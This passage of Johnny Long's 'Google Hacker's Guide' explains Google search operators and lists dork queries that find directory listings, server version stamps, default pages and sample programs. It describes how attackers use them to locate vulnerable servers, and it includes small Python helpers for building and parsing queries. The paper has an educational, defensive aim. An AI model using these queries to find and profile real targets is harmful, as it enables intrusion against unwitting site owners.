The Google Hacker’s Guide
Understanding and Defending Against
the Google Hacker
by Johnny Long
johnny@ihackstuff.com
http://johnny.ihackstuff.com
GOOGLE SEARCH TECHNIQUES
    GOOGLE WEB INTERFACE
    BASIC SEARCH TECHNIQUES
GOOGLE ADVANCED OPERATORS
    ABOUT GOOGLE’S URL SYNTAX
GOOGLE HACKING TECHNIQUES
    DOMAIN SEARCHES USING THE ‘SITE’ OPERATOR
    FINDING ‘GOOGLETURDS’ USING THE ‘SITE’ OPERATOR
    SITE MAPPING: MORE ABOUT THE ‘SITE’ OPERATOR
    FINDING DIRECTORY LISTINGS
    VERSIONING: OBTAINING THE WEB SERVER SOFTWARE / VERSION
        via directory listings
        via default pages
        via manuals, help pages and sample programs
    USING GOOGLE AS A CGI SCANNER
    USING GOOGLE TO FIND INTERESTING FILES AND DIRECTORIES
ABOUT GOOGLE AUTOMATED SCANNING
OTHER GOOGLE STUFF
    GOOGLE APPLIANCES
    GOOGLEDORKS
    GOOSCAN
    GOOPOT
A WORD ABOUT HOW GOOGLE FINDS PAGES (OPERA)
PROTECTING YOURSELF FROM GOOGLE HACKERS
THANKS AND SHOUTS
The Google search engine found at www.google.com offers many different features
including language and document translation, web, image, newsgroups, catalog and
news searches and more. These features offer obvious benefits to even the most
uninitiated web surfer, but the same features open up far more nefarious possibilities
for malicious Internet users, including hackers, computer criminals, identity
thieves and even terrorists. This paper outlines these darker applications of the
Google search engine, techniques that have collectively been termed “Google hacking.”
The intent of this paper is to educate web administrators and the security community in
the hope of eventually stopping this form of information leakage.
Google search techniques
Google web interface
The Google search engine is fantastically easy to use. Despite the simplicity, it is very
important to have a firm grasp of these basic techniques in order to fully comprehend the
more advanced uses. The most basic Google search can involve a single word entered
into the search page found at www.google.com.
Figure 1: The main Google search page
As shown in Figure 1, I have entered the word “sardine” into the search screen. Figure 1
shows many of the options available from the www.google.com front page.
The Google toolbar: The Internet Explorer browser I am using has a Google
“toolbar” (a free download from toolbar.google.com) installed
and presented under the address bar. Although the toolbar
offers many different features, it is not a required element for
performing advanced searches. Even the most advanced
search functionality is available to any user able to access the
www.google.com web page with any type of browser, including
text-based and mobile browsers.
“Web, Images, Groups, Directory and News” tabs: These tabs allow you to search web pages,
photographs, message group postings, Google directory listings, and news
stories respectively. First-time Google users should consider
that these tabs are not always a replacement for the “Submit
Search” button.
Search term input field: Located directly below the alternate search tabs, this text field
allows the user to enter a Google search term. Search term
rules will be described later.
“Submit Search”: This button submits the search term supplied by the user. In
many browsers, simply pressing the “Enter/Return” key after
typing a search term will activate this button.
“I’m Feeling Lucky”: Instead of presenting a list of search results, this button will
forward the user to the highest-ranked page for the entered
search term. Often, this page is the most relevant page
for the entered search term.
“Advanced Search”: This link takes the user to the “Advanced Search” page as
shown in Figure 2. Much of the advanced search functionality is
accessible from this page. Some advanced features are not
listed on this page.
“Preferences”: This link allows the user to select several options (which are
stored in cookies on the user’s machine for later retrieval)
including languages, filters, number of results per page, and
window options.
“Language tools”: This link allows the user to set many different language options
and translate text to and from various languages.
Figure 2: Advanced Search page
Once a user submits a search by clicking the “Submit Search” button or by pressing
enter in the search term input box, a results page may be displayed as shown in Figure
3.
Figure 3: A basic Google search results page.
The search results page allows the user to explore the search results in various ways.
Top line: The top line (found under the alternate search tabs) lists the
search query, the number of hits displayed and found, and
how long the search took.
“Category” link: This link takes you to the Google directory category for the
search you entered. The Google directory is a highly
organized directory of the web pages that Google monitors.
Main page link: This link takes you directly to a web page. Figure 3 shows
this as “Sardine Factory :: Home page”.
Description: The short description of a site.
Cached link: This link takes you to Google’s copy of this web page. This
is very handy if a web page changes or goes down.
“Similar Pages”: This link takes you to similar pages based on the Google
category.
“Sponsored Links” column: This column lists paid, targeted advertising links based on
your search query.
Under certain circumstances, a blank error page (see Figure 4) may be presented
instead of the search results page. This page is the catchall error page, which generally
means Google encountered a problem with the submitted search term. Many times this
means that a search query option was not entered properly.
Figure 4: The "blank" error page
In addition to the “blank” error page, another error page may be presented as shown in
Figure 5. This page is much more descriptive, informing the user that a search term was
missing. This message indicates that the user needs to add to the search query.
Figure 5: Another Google error page
There is a great deal more to Google’s web-based search functionality which is not
covered in this paper.
Basic search techniques
Simple word searches
Basic Google searches, as I have already presented, consist of one or more
words entered without any quotation marks or special keywords. Examples:
peanut butter
butter peanut
olive oil popeye
‘+’ searches
When supplying a list of search terms, Google automatically tries to find every
word in the list of terms, making the Boolean operator “AND” redundant. Some
search engines may use the plus sign as a way of signifying a Boolean “AND”.
Google uses the plus sign in a different fashion. When Google receives a basic
search request that contains a very common word like “the”, “how” or “where”,
the word will often be removed from the query as shown in Figure 6.
Figure 6: Google removing overly common words
In order to force Google to include a common word, precede the search term with
a plus (+) sign. Do not use a space between the plus sign and the search term.
For example, the following searches produce slightly different results:
where quick brown fox
+where quick brown fox
The ‘+’ operator can also be applied to Google advanced operators, discussed
below.
‘-’ searches
Excluding a term from a search query is as simple as placing a minus sign (-)
before the term. Do not use a space between the minus sign and the search
term. For example, the following searches produce slightly different results:
quick brown fox
quick -brown fox
The ‘-’ operator can also be applied to Google advanced operators, discussed
below.
Phrase Searches
In order to search for a phrase, supply the phrase surrounded by double-quotes.
Examples:
“the quick brown fox”
“liberty and justice for all”
“harry met sally”
Arguments to Google advanced operators can be phrases enclosed in quotes, as
described below.
Mixed searches
Mixed searches can involve both phrases and individual terms. Example:
macintosh "microsoft office"
This search will only return results that include the phrase “Microsoft office” and
the term macintosh.
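The basic search rules above can be sketched as a small helper that assembles a query string. This is only an illustration of the syntax described in this paper; the function name build_query and its parameters are hypothetical and are not part of any Google tool.

```python
def build_query(terms=(), phrases=(), required=(), excluded=()):
    """Assemble a basic query string following the rules described above."""
    parts = []
    parts.extend(terms)                        # plain words, searched as-is
    parts.extend(f'"{p}"' for p in phrases)    # phrases go inside double quotes
    parts.extend(f"+{w}" for w in required)    # '+' with no space forces a common word
    parts.extend(f"-{w}" for w in excluded)    # '-' with no space excludes a word
    return " ".join(parts)


print(build_query(terms=["macintosh"], phrases=["microsoft office"]))
print(build_query(terms=["quick", "fox"], excluded=["brown"]))
```

The first call reproduces the mixed search shown above; the second produces a ‘-’ search with the sign attached directly to the excluded term.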
Google advanced operators
Google allows the use of certain operators to help refine searches. The use of advanced
operators is very simple as long as attention is given to the syntax. The basic format is:
operator:search_term
Notice that there is no space between the operator, the colon and the search term. If a
space is used after a colon, Google will display an error message. If a space is used
before the colon, Google will use your intended operator as a search term.
Some advanced operators can be used as a standalone query. For example
‘cache:www.google.com’ can be submitted to Google as a valid search query. The
‘site’ operator, by contrast, must be used along with a search term, such as
‘site:www.google.com help’.
Table 1: Advanced Operator Summary
Operator     Description                                                     Additional search argument required?
site:        find search term only on site specified by search_term         YES
filetype:    search documents of type search_term                            YES
link:        find sites containing search_term as a link                     NO
cache:       display the cached version of page specified by search_term     NO
intitle:     find sites containing search_term in the title of a page        NO
inurl:       find sites containing search_term in the URL of the page        NO
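As a rough sketch of the operator:search_term format, the helper below joins an operator and its argument with no surrounding spaces and wraps multi-word arguments in quotes. The name operator_query and the KNOWN_OPERATORS set are assumptions made for this example; the set simply mirrors the operators listed in Table 1.

```python
# Operators summarized in Table 1 (illustrative set, not an official list).
KNOWN_OPERATORS = {"site", "filetype", "link", "cache", "intitle", "inurl"}


def operator_query(operator, argument, extra_terms=""):
    """Format 'operator:argument' with no space on either side of the colon."""
    if operator not in KNOWN_OPERATORS:
        raise ValueError(f"unknown operator: {operator!r}")
    argument = argument.strip()
    if not argument:
        raise ValueError("the operator needs an argument")
    if " " in argument:
        argument = f'"{argument}"'   # phrase arguments are enclosed in quotes
    query = f"{operator}:{argument}"
    if extra_terms:
        query += " " + extra_terms   # additional search terms follow after a space
    return query


print(operator_query("site", "harvard.edu", "tuition"))
print(operator_query("cache", "www.google.com"))
```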
site: find web pages on a specific web site
This advanced operator instructs Google to restrict a search to a specific web site or
domain. When using this operator, an additional search argument is required.
Example:
site:harvard.edu tuition
This query will return results from harvard.edu that include the term tuition anywhere on
the page.
filetype: search only within files of a specific type.
This operator instructs Google to search only within the text of a particular type of file.
This operator requires an additional search argument.
Example:
filetype:txt endometriosis
This query searches for the word ‘endometriosis’ within standard text documents. There
should be no period (.) before the filetype and no space around the colon following the
word “filetype”. It is important to note that Google only claims to be able to search within
certain types of files. Based on my experience, Google can search within most files that
present as plain text. For example, Google can easily find a word within a file of type
“.txt,” “.html” or “.php” since the output of these files in a typical web browser window is
textual. By contrast, while a WordPerfect document may look like text when opened with
the WordPerfect application, that type of file is not recognizable to the standard web
browser without special plugins and, by extension, Google cannot interpret the
document properly, making a search within that document impossible. Thankfully,
Google can search within specific types of special files, making a search like
“filetype:doc endometriosis” a valid one.
The current list of files that Google can search is listed in the filetype FAQ located at
http://www.google.com/help/faq_filetypes.html. As of this writing, Google can search
within the following file types:
• Adobe Portable Document Format (pdf)
• Adobe PostScript (ps)
• Lotus 1-2-3 (wk1, wk2, wk3, wk4, wk5, wki, wks, wku)
• Lotus WordPro (lwp)
• MacWrite (mw)
• Microsoft Excel (xls)
• Microsoft PowerPoint (ppt)
• Microsoft Word (doc)
• Microsoft Works (wks, wps, wdb)
• Microsoft Write (wri)
• Rich Text Format (rtf)
• Text (ans, txt)
link: search within links
The hyperlink is one of the cornerstones of the Internet. A hyperlink is a selectable
connection from one web page to another. Most often, these links appear as underlined
text but they can appear as images, video or any other type of multimedia content. This
advanced operator instructs Google to search within hyperlinks for a search term. This
operator requires no other search arguments.
Example:
link:www.apple.com
This query would display web pages that link to Apple.com’s main page. This
special operator is somewhat limited in that the link must appear exactly as entered in
the search query. The above query would not find pages that link to
www.apple.com/ipod, for example.
cache: display Google’s cached version of a page
This operator displays the version of a web page as it appeared when Google crawled
the site. This operator requires no other search arguments.
Example:
cache:johnny.ihackstuff.com
cache:http://johnny.ihackstuff.com
These queries would display the cached version of Johnny’s web page. Note that both of
these queries return the same result. I have discovered, however, that sometimes
queries formed like these may return different results, with one result being the dreaded
“cache page not found” error. This operator also accepts whole URL lines as arguments.
intitle: search within the title of a document
This operator instructs Google to search for a term within the title of a document. Most
web browsers display the title of a document on the top title bar of the browser window.
This operator requires no other search arguments.
Example:
intitle:gandalf
This query would only display pages that contained the word ‘gandalf’ in the title. A
derivative of this operator, ‘allintitle’ works in a similar fashion.
Example:
allintitle:gandalf silmarillion
This query finds both the words ‘gandalf’ and ‘silmarillion’ in the title of a page. The
‘allintitle’ operator instructs Google to find every subsequent word in the query only in the
title of the page. This is equivalent to a string of individual ‘intitle’ searches.
inurl: search within the URL of a page
This operator instructs Google to search only within the URL, or web address of a
document. This operator requires no other search arguments.
Example:
inurl:amidala
This query would display pages with the word ‘amidala’ inside the web address. One
returned result, ‘http://www.yarwood.org/kell/amidala/’ contains the word
‘amidala’ as the name of a directory. The word can appear anywhere within the web
address, including the name of the site or the name of a file. A derivative of this operator,
‘allinurl’ works in a similar fashion.
Example:
allinurl:amidala gallery
This query finds both the words ‘amidala’ and ‘gallery’ in the URL of a page. The ‘allinurl’
operator instructs Google to find every subsequent word in the query only in the URL of
the page. This is equivalent to a string of individual ‘inurl’ searches.
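The stated equivalence between an ‘all’ operator and a string of individual operators can be illustrated with a short sketch. The function name expand_all_operator is hypothetical; it only rewrites the query text and says nothing about how Google processes either form internally.

```python
def expand_all_operator(query):
    """Rewrite 'allintitle:a b' as 'intitle:a intitle:b' (same for allinurl)."""
    operator, _, words = query.partition(":")
    if operator not in ("allintitle", "allinurl"):
        raise ValueError("expected an allintitle: or allinurl: query")
    single = operator[3:]   # 'allintitle' -> 'intitle', 'allinurl' -> 'inurl'
    return " ".join(f"{single}:{word}" for word in words.split())


print(expand_all_operator("allintitle:gandalf silmarillion"))
print(expand_all_operator("allinurl:amidala gallery"))
```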
For a complete list of advanced operators and their usage, see
http://www.google.com/help/operators.html.
About Google’s URL syntax
The advanced Google user often streamlines the search process by use of the
Google toolbar (not discussed here) or through direct use of Google URLs. For
example, consider the URL generated by the web search for sardine:
http://www.google.com/search?hl=en&ie=UTF-8&oe=UTF-8&q=sardine
First, notice that the base URL for a Google search is
“http://www.google.com/search”. The question mark denotes the end of the URL
and the beginning of the arguments to the “search” program. The “&” symbol separates
arguments. The URL presented to the user may vary depending on many factors
including whether or not the search was submitted via the toolbar, the native language of
the user, etc. Arguments to the Google search program are well documented at
http://www.google.com/apis. The arguments found in the above URL are as follows:
hl: Native language results, in this case “en” or English.
ie: Input encoding, the format of incoming data. In this case “UTF-8”.
oe: Output encoding, the format of outgoing data. In this case “UTF-8”.
q: Query. The search query submitted by the user. In this case “sardine”.
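The breakdown above (base URL, question mark, “&”-separated arguments) can be reproduced with Python’s standard urllib.parse module. This is a minimal sketch; the helper name split_search_url is an assumption made for the example.

```python
from urllib.parse import urlsplit, parse_qsl


def split_search_url(url):
    """Return the base URL and a dict of the arguments that follow the '?'."""
    parts = urlsplit(url)
    base = f"{parts.scheme}://{parts.netloc}{parts.path}"
    arguments = dict(parse_qsl(parts.query))   # splits on '&', then on '='
    return base, arguments


base, arguments = split_search_url(
    "http://www.google.com/search?hl=en&ie=UTF-8&oe=UTF-8&q=sardine"
)
print(base)        # http://www.google.com/search
print(arguments)   # {'hl': 'en', 'ie': 'UTF-8', 'oe': 'UTF-8', 'q': 'sardine'}
```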
Most of the arguments in this URL can be omitted.
For example, the above URL can be shortened to
http://www.google.com/search?q=sardine
making the URL much more concise. Additional search terms can be appended to the
URL with the plus sign. For example, to search for “sardine” along with “peanut” and
“butter,” consider using this URL:
http://www.google.com/search?q=sardine+peanut+butter
Since simplified Google URLs are simple to read and portable, they are often used as a
way to represent a Google search.
Google (and many other web-based programs) must represent special characters like
quotation marks in a URL with a hexadecimal number preceded by a percent (%) sign in
order to follow the http URL standard. For example, a search for “the quick brown fox”
(paying special attention to the quotation marks) is represented as
http://www.google.com/search?&q=%22the+quick+brown+fox%22
In this example, a double quote is displayed as “%22” and spaces are replaced by plus
(+) signs. Google does not exclude overly common words from phrase searches. Overly
common words are automatically included when enclosed in double-quotes.
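The encoding rules just described can be sketched with the standard library: urllib.parse.urlencode replaces spaces with plus signs and percent-encodes double quotes as %22. The helper name search_url is hypothetical, and the sketch emits only the q argument, so its output omits the stray “&” seen in the example URL above.

```python
from urllib.parse import urlencode


def search_url(query):
    """Build a simplified Google search URL for the given query string."""
    # urlencode uses '+' for spaces and %XX hexadecimal escapes for special characters.
    return "http://www.google.com/search?" + urlencode({"q": query})


print(search_url("sardine peanut butter"))
print(search_url('"the quick brown fox"'))
```

The second call yields http://www.google.com/search?q=%22the+quick+brown+fox%22, matching the phrase-search URL shown above apart from the extra “&”.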
Google hacking techniques
Domain searches using the ‘site’ operator
The site operator can be expanded to search out entire domains. For example:
site:gov secret
This query searches every web site in the .gov domain for the word ‘secret’. Notice that
the site operator works on addresses in reverse. For example, Google expects the site
operator to be used like this:
site:www.cia.gov
site:cia.gov
site:gov
Google would not necessarily expect the site operator to be used like this:
site:www.cia
site:www
site:cia
The reason for this is simple. ‘Cia’ and ‘www’ are not valid top-level domain names. This
means that as of this writing, Internet names may not end in ‘cia’ or ‘www’. However,
sending unexpected queries like these is part of a competent Google hacker’s arsenal
as we explore in the “googleturds” section.
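To illustrate how the site operator works on addresses “in reverse,” the sketch below lists the expected site queries for a host name by dropping labels from the left, so that every query still ends in the top-level domain. The function name site_queries is an assumption made for this example.

```python
def site_queries(hostname):
    """List 'site:' queries from most specific host to bare top-level domain."""
    labels = hostname.lower().strip(".").split(".")
    # Drop labels from the left so each suffix still ends in the top-level domain.
    return ["site:" + ".".join(labels[i:]) for i in range(len(labels))]


print(site_queries("www.cia.gov"))
# ['site:www.cia.gov', 'site:cia.gov', 'site:gov']
```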
How this technique can be used
1. Journalists, snoops and busybodies in general can use this technique to find
interesting ‘dirt’ about a group of websites owned by organizations such as a
government or non-profit organization. Remember that top-level domain names
are often very descriptive and can include interesting groups such as: the U.S.
Government (.gov or .us)
2. Hackers searching for targets. If a hacker harbors a grudge against a specific
country or organization, he can use this type of search to find sensitive targets.
Finding ‘googleturds’ using the ‘site’ operator
Googleturds, as I have named them, are little dirty pieces of Google ‘waste’. These
search results seem to have stemmed from typos Google found while crawling a web
page. Example:
site:csc
site:microsoft
Neither of these queries is valid according to the loose rules of the ‘site’ operator, since
they do not end in valid top-level domain names. However, these queries produce
interesting results as shown in Figure 7.
Figure 7: Googleturd example
These little bits of information are most likely the results of typographical errors in links
placed on web pages.
How this technique can be used
Hackers investigating a target can use munged site values based on the target’s name
to dig up Google pages (and subsequently potentially sensitive data) that may not be
available to Google searches using the valid ‘site’ operator. Example: A hacker is
interested in sensitive information about ABCD Corporation, located on the web at
www.ABCD.com. Using a query like ‘site:ABCD’ may find mistyped links
(http://www.abcd instead of http://www.abcd.com) containing interesting information.
Site mapping: More about the ‘site’ operator
Mapping the contents of a web server via Google is simple. Consider the following
query:
site:www.microsoft.com microsoft
This query searches for the word ‘microsoft’, restricting the search to the
www.microsoft.com web site. How many pages on the Microsoft web server contain the
word ‘microsoft?’ According to Google, all of them! Remember that Google searches not
only the content of a page, but the title and URL as well. The word ‘microsoft’ appears in
the URL of every page on www.microsoft.com. With one single query, an attacker gains
a rundown of every web page on a site cached by Google.
There are some exceptions to this rule. If a link on the Microsoft web page points back to
the IP address of the Microsoft web server, Google will cache that page as belonging to
the IP address, not the www.microsoft.com web server. In this special case, an attacker
would simply alter the query, replacing the word ‘microsoft’ with the IP address(es) of the
Microsoft web server.
Google has recently added an additional method of accomplishing this task. This
technique allows Google users to simply enter a ‘site’ query alone. Example:
site:microsoft.com
This technique is simpler, but I’m not sure if this search technique is a permanent
Google feature.
Since Google only follows links that it finds on the Web, don’t expect this technique to
return every single web page hosted on a web server.
How this technique can be used
This technique makes it very simple for any interested party to get a complete rundown
of a website’s structure without ever visiting the website directly. Since Google searches
occur on Google’s servers, it stands to reason that only Google has a record of that
search. The process of viewing cached pages from Google can also be safe as long as
the Google hacker takes special care not to allow his browser to load linked content
such as images from that cached page. For a competent attacker, this is a trivial
exercise. Simply put, Google allows for a great deal of target reconnaissance that results
in little or no exposure for the attacker.
Finding Directory listings
Directory listings provide a list of files and directories in a browser window instead of the
typical text-and-graphics mix generally associated with web pages. Figure 8 shows a
typical directory listing.
Figure 8: A typical directory listing
Directory listings are often placed on web servers purposely to allow visitors to browse
and download files from a directory tree. Many times, however, directory listings are not
intentional. A misconfigured web server may produce a directory listing if an index, or
main web page, file is missing. In some cases, directory listings are set up as a
temporary storage location for files. Either way, there’s a good chance that an attacker
may find something interesting inside a directory listing.
Locating directory listings with Google is fairly straightforward. Figure 8 shows that most
directory listings begin with the phrase “Index of”, which also shows in the title. An
obvious query to find this type of page might be “intitle:index.of”, which may find
pages with the term ‘index of’ in the title of the document. Remember that the period (.)
serves as a single-character wildcard in Google. Unfortunately, this query will return a
large number of false-positives such as pages with the following titles:
Index of Native American Resources on the Internet
LibDex - Worldwide index of library catalogues
Iowa State Entomology Index of Internet Resources
Judging from the titles of these documents, it is obvious that not only are these web
pages intentional, they are also not the directory listings we are looking for. (*jedi wave*
“This is not the directory listing you’re looking for.”) Several alternate queries provide
more accurate results:
intitle:index.of "parent directory"
intitle:index.of name size
These queries indeed provide directory listings by not only focusing on “index.of” in the
title, but on key words often found inside directory listings such as “parent directory”
“name” and “size.”
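The same filtering idea can be sketched offline, for example by an administrator checking pages from his own site. The code below treats the period as a single-character wildcard, as described above, and requires the extra key words before calling a page a directory listing. Both function names are hypothetical, and the substring checks are deliberately loose; this is a heuristic, not a reproduction of Google’s matching.

```python
import re


def google_dot_pattern(term):
    """Compile a term such as 'index.of' so that '.' matches any one character."""
    pattern = "".join("." if ch == "." else re.escape(ch) for ch in term)
    return re.compile(pattern, re.IGNORECASE)


def looks_like_directory_listing(title, body):
    """Heuristic: 'index.of' in the title plus key words found inside listings."""
    has_index_of = google_dot_pattern("index.of").search(title) is not None
    body_lower = body.lower()
    has_parent = "parent directory" in body_lower
    has_columns = "name" in body_lower and "size" in body_lower
    return has_index_of and (has_parent or has_columns)


print(looks_like_directory_listing(
    "Index of /backup", "Name Last modified Size Parent Directory"))
print(looks_like_directory_listing(
    "LibDex - Worldwide index of library catalogues",
    "Browse library catalogues by country"))
```

The first call prints True and the second prints False: the LibDex title matches “index.of”, but the page lacks the key words, so it is rejected as a false positive.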
How this technique can be used
Bear in mind that many directory listings are intentional. However, directory listings
provide the Google hacker a very handy way to quickly navigate through a site. For the
purposes of finding sensitive or interesting information, browsing through lists of file and
directory names can be much more productive than surfing through the guided content
of web pages. Directory listings provide a means of exploiting other techniques such as
versioning and file searching, explained below.
Versioning: Obtaining the Web Server Software / Version
via directory listings
The exact version of the web server software running on a server is one piece of
information an attacker needs before launching a successful attack against
that web server. If an attacker connects directly to that web server, the HTTP (web)
headers from that server can provide this information. It is possible, however, to retrieve
similar information from Google without ever connecting to the target server under
investigation. One method involves using the information provided in a directory
listing.
Figure 9: Directory listing "server.at" example
Figure 9 shows the bottom line of a typical directory listing. Notice that the directory
listing includes the name of the server software as well as the version. An adept web
administrator can fake this information, but this information is often legitimate, allowing
an attacker to determine what attacks may work against the server. This example was
gathered using the following query:
intitle:index.of server.at
This query focuses on the term “index of” in the title and “server at” appearing at the
bottom of the directory listing. This type of query can additionally be pointed at a
particular web server:
intitle:index.of server.at site:aol.com
The result of this query indicates that gprojects.web.aol.com and vidup-r1.blue.aol.com
both run Apache web servers.
intitle:index.of server.at site:apple.com
The result of this query indicates that mirror.apple.com runs an Apache web server. This
technique can also be used to find servers running a particular version of a web server.
For example:
intitle:index.of "Apache/1.3.0 Server at"
This query will find servers with directory listings enabled that are running Apache
version 1.3.0.
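An administrator auditing his own directory listings could pull the software name and version out of such a stamp with a regular expression. This is a minimal sketch: the function name parse_server_stamp is hypothetical, the sample line uses a made-up host (www.example.com), and the trailing “Port 80” is an assumption about the stamp’s layout rather than something shown in this paper.

```python
import re

# Matches stamps of the form "<software>/<version> ... Server at <host>".
STAMP = re.compile(
    r"(?P<software>[A-Za-z][\w-]*)/(?P<version>\d+(?:\.\d+)*)\b"
    r".*?\bServer at (?P<host>\S+)"
)


def parse_server_stamp(line):
    """Return software, version and host from a listing footer, or None."""
    match = STAMP.search(line)
    return match.groupdict() if match else None


print(parse_server_stamp("Apache/1.3.0 Server at www.example.com Port 80"))
# {'software': 'Apache', 'version': '1.3.0', 'host': 'www.example.com'}
```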
How this technique can be used
This technique is somewhat limited by the fact that the target must have at least one
page that produces a directory listing, and that listing must have the server version
stamped at the bottom of the page. There are more advanced techniques that can be
employed if the server ‘stamp’ at the bottom of the page is missing. One is a ‘profiling’
technique, which focuses on the headers, title, and overall
format of the directory listing for clues as to what web server software is running.
By comparing known directory listing formats to the target’s directory listing format, a
competent Google hacker can generally nail the server version fairly quickly. This
technique is also flawed in that most servers allow directory listings to be completely
customized, making a match difficult. Some directory listings are not under the control of
the web server at all but instead rely on third-party software. In this particular case, it
may be possible to identify the third party software running by focusing on the source
(‘view source’ in most browsers) of the directory listing’s web page or by using the
profiling technique listed above.
Regardless of how likely it is to determine the web server version of a specific server
using this technique, hackers (especially web defacers) can use this technique to troll
Google for potential victims. If a hacker has an exploit that works against, say, Apache
1.3.0, he can quickly scan Google for victims with a simple search like
‘intitle:index.of "Apache/1.3.0 Server at"’. This would return a list of
servers that have at least one directory listing with the Apache 1.3.0 server tag at the
bottom of the listing. This technique can be used for any web server that tags directory
listings with the server version, as long as the attacker knows in advance what that tag
might look like.
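An administrator checking his own directory listings can look for the same version tag with a short script. The following is a minimal Python sketch, not a definitive tool: the function name find_server_stamp and the sample footer are illustrative assumptions, and the pattern only covers tags of the form "Software/x.y.z Server at host".

```python
import re

# Matches footers such as "Apache/1.3.0 Server at www.example.com Port 80".
# The pattern is an assumption based on the tag format discussed above.
STAMP = re.compile(
    r"(?P<software>[A-Za-z][\w-]*)/(?P<version>\d+(?:\.\d+)*)"
    r"[^<]*? Server at (?P<host>[\w.-]+)"
)

def find_server_stamp(listing_html):
    """Return (software, version, host) if a server tag is present, else None."""
    match = STAMP.search(listing_html)
    if match is None:
        return None
    return match.group("software"), match.group("version"), match.group("host")

# Hypothetical footer from a directory listing page.
sample = "<address>Apache/1.3.0 Server at www.example.com Port 80</address>"
print(find_server_stamp(sample))
```

A result of None only means this particular tag format was not found; a customized listing may still reveal the server through the profiling clues described earlier.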
via default pages
It is also possible to determine the version of a web server based on default pages.
When a web server is installed, it generally will ship with a set of default web pages, like
the Apache 1.2.6 page shown in Figure 10.
Figure 10: Apache test page
These pages can make it easy for a site administrator to get a web server running. By
providing a simple page to test, the administrator can simply connect to his own web
server with a browser to validate that the web server was installed correctly. Some
operating systems even come with web server software already installed. In this case,
an Internet user may not even realize that a web server is running on his machine. This
type of casual behavior on the part of an Internet user will lead an attacker to rightly
assume that the web server is not well maintained and is, by extension, insecure. By
further extension, the attacker can also assume that the entire operating system of the
server may be vulnerable by virtue of poor maintenance.
How this technique can be used
A simple query of “intitle:Test.Page.for.Apache it.worked!” will return a list
of sites running Apache 1.2.6 with a default home page. Other queries will return similar
Apache results:
Apache server version     Query
Apache 1.3.0 – 1.3.9      intitle:Test.Page.for.Apache It.worked! this.web.site!
Apache 1.3.11 – 1.3.26    intitle:Test.Page.for.Apache seeing.this.instead
Apache 2.0                intitle:Simple.page.for.Apache Apache.Hook.Functions
Apache SSL/TLS            intitle:test.page "Hey, it worked !" "SSL/TLS-aware"
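The table can also be read in reverse, to check whether a page on your own server still looks like one of these default pages. The sketch below is a rough Python illustration covering three of the rows. The phrases are taken from the queries above with each "." read as a space, which is an assumption about how the period behaves in these queries, and guess_apache_version is a hypothetical name.

```python
# Each rule: (version label, phrase expected in the title, phrases expected in the body).
# Phrases come from the queries in the table above, with "." read as a space (assumption).
RULES = [
    ("Apache 1.3.0 - 1.3.9", "test page for apache", ["it worked!", "this web site!"]),
    ("Apache 1.3.11 - 1.3.26", "test page for apache", ["seeing this instead"]),
    ("Apache 2.0", "simple page for apache", ["apache hook functions"]),
]

def guess_apache_version(title, body):
    """Return the first version label whose phrases all appear, else None."""
    title, body = title.lower(), body.lower()
    for label, title_phrase, body_phrases in RULES:
        if title_phrase in title and all(p in body for p in body_phrases):
            return label
    return None

# Hypothetical title and body text from a page under review.
print(guess_apache_version(
    "Test Page for Apache Installation",
    "Seeing this instead of the website you expected?",
))
```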
Microsoft’s Internet Information Services (IIS) also ships with default web pages as
shown in Figure 11.
Figure 11: IIS 5.0 default web page
Queries that will locate default IIS web pages include:
IIS Server Version    Query
Many                  intitle:welcome.to intitle:internet IIS
Unknown               intitle:"Under construction" "does not currently have"
IIS 4.0               intitle:welcome.to.IIS.4.0
IIS 4.0               allintitle:Welcome to Windows NT 4.0 Option Pack
IIS 4.0               allintitle:Welcome to Internet Information Server
IIS 5.0               allintitle:Welcome to Windows 2000 Internet Services
IIS 6.0               allintitle:Welcome to Windows XP Server Internet Services
In the case of Microsoft-based web servers, it is not only possible to determine web
server version, but operating system and service pack version as well. This information is
invaluable to an attacker bent on hacking not only the web server, but hacking beyond
the web server and into the operating system itself. In most cases, an attacker with
control of the operating system can wreak more havoc on a machine than a hacker that
only controls the web server.
Netscape Servers also ship with default pages as shown in Figure 12.
Figure 12: Netscape Enterprise Server default page
Some queries that will locate default Netscape web pages include:
Netscape Server Version    Query
Many                       allintitle:Netscape Enterprise Server Home Page
Unknown                    allintitle:Netscape FastTrack Server Home Page
Some queries to find more esoteric web servers/applications include:
Server / Version             Query
Jigsaw / 2.2.3               intitle:"jigsaw overview" "this is your"
Jigsaw / Many                intitle:"jigsaw overview"
iPlanet / Many               intitle:"web server, enterprise edition"
Resin / Many                 allintitle:Resin Default Home Page
Resin / Enterprise           allintitle:Resin-Enterprise Default Home Page
JWS / 1.0.3 – 2.0            allintitle:default home page java web server
J2EE / Many                  intitle:"default j2ee home page"
KFSensor honeypot            "KF Web Server Home Page"
Kwiki                        "Congratulations! You've created a new Kwiki website."
Matrix Appliance             "Welcome to your domain web page" matrix
HP appliance sa1*            intitle:"default domain page" "congratulations" "hp web"
Intel Netstructure           "congratulations on choosing" intel netstructure
Generic Appliance            "default web page" congratulations "hosting appliance"
Debian Apache                intitle:"Welcome to Your New Home Page!" debian
Cisco Micro Webserver 200    "micro webserver home page"
via manuals, help pages and sample programs
Another method of determining server version involves searching for manuals, help
pages or sample programs which may be installed on the website by default. Many web
server distributions install manual pages and sample programs in default locations. Over
the years, hackers have found many ways to exploit these default web applications to
gain privileged access to the web server. Because of this, most web server vendors
insist that administrators remove this sample code before placing a server on the
Internet. Regardless of the potential vulnerability of such programs, the mere existence
of these programs can help determine the web server type and version. Google can
stumble on these directories via a default-installed webpage or other means.
How this technique can be used
In addition to determining the web server version of a specific target, hackers can use
this technique to find vulnerable targets.
Example:
inurl:manual apache directives modules
This query returns pages that host the Apache web server manuals. The Apache
manuals are included in the default installation package of many different versions of
Apache. Different versions of Apache may have different styles of manual, and the
location of manuals may differ, if they are installed at all. As evidenced in Figure 13, the
server version is reported at the top of the manual page. This may not reflect the current
version of the web server if the server has been upgraded since the original installation.
Figure 13: Determining server version via server manuals
Microsoft’s IIS often deploys manuals (termed ‘help pages’) with various versions of the
web server. One way to search for these default help pages is with a query like
‘allinurl:iishelp core’.
Many versions of IIS optionally install sample applications. These sample
applications are often included in a directory called ‘iissamples,’ which may be discovered
using a query like ‘inurl:iissamples’. In addition, the name of a sample program
can be included in the query, such as ‘inurl:iissamples advquery.asp’ as shown
in Figure 14.
Figure 14: An IIS server with default sample code installed
Many times, subdirectories may exist inside the samples directory. A page with both the
‘iissamples’ directory and the ‘sdk’ directory can be found with a query like
‘inurl:iissamples sdk’.
There are many more combinations of default manual, help pages and sample programs
that can be searched for. As mentioned above, these programs often contain
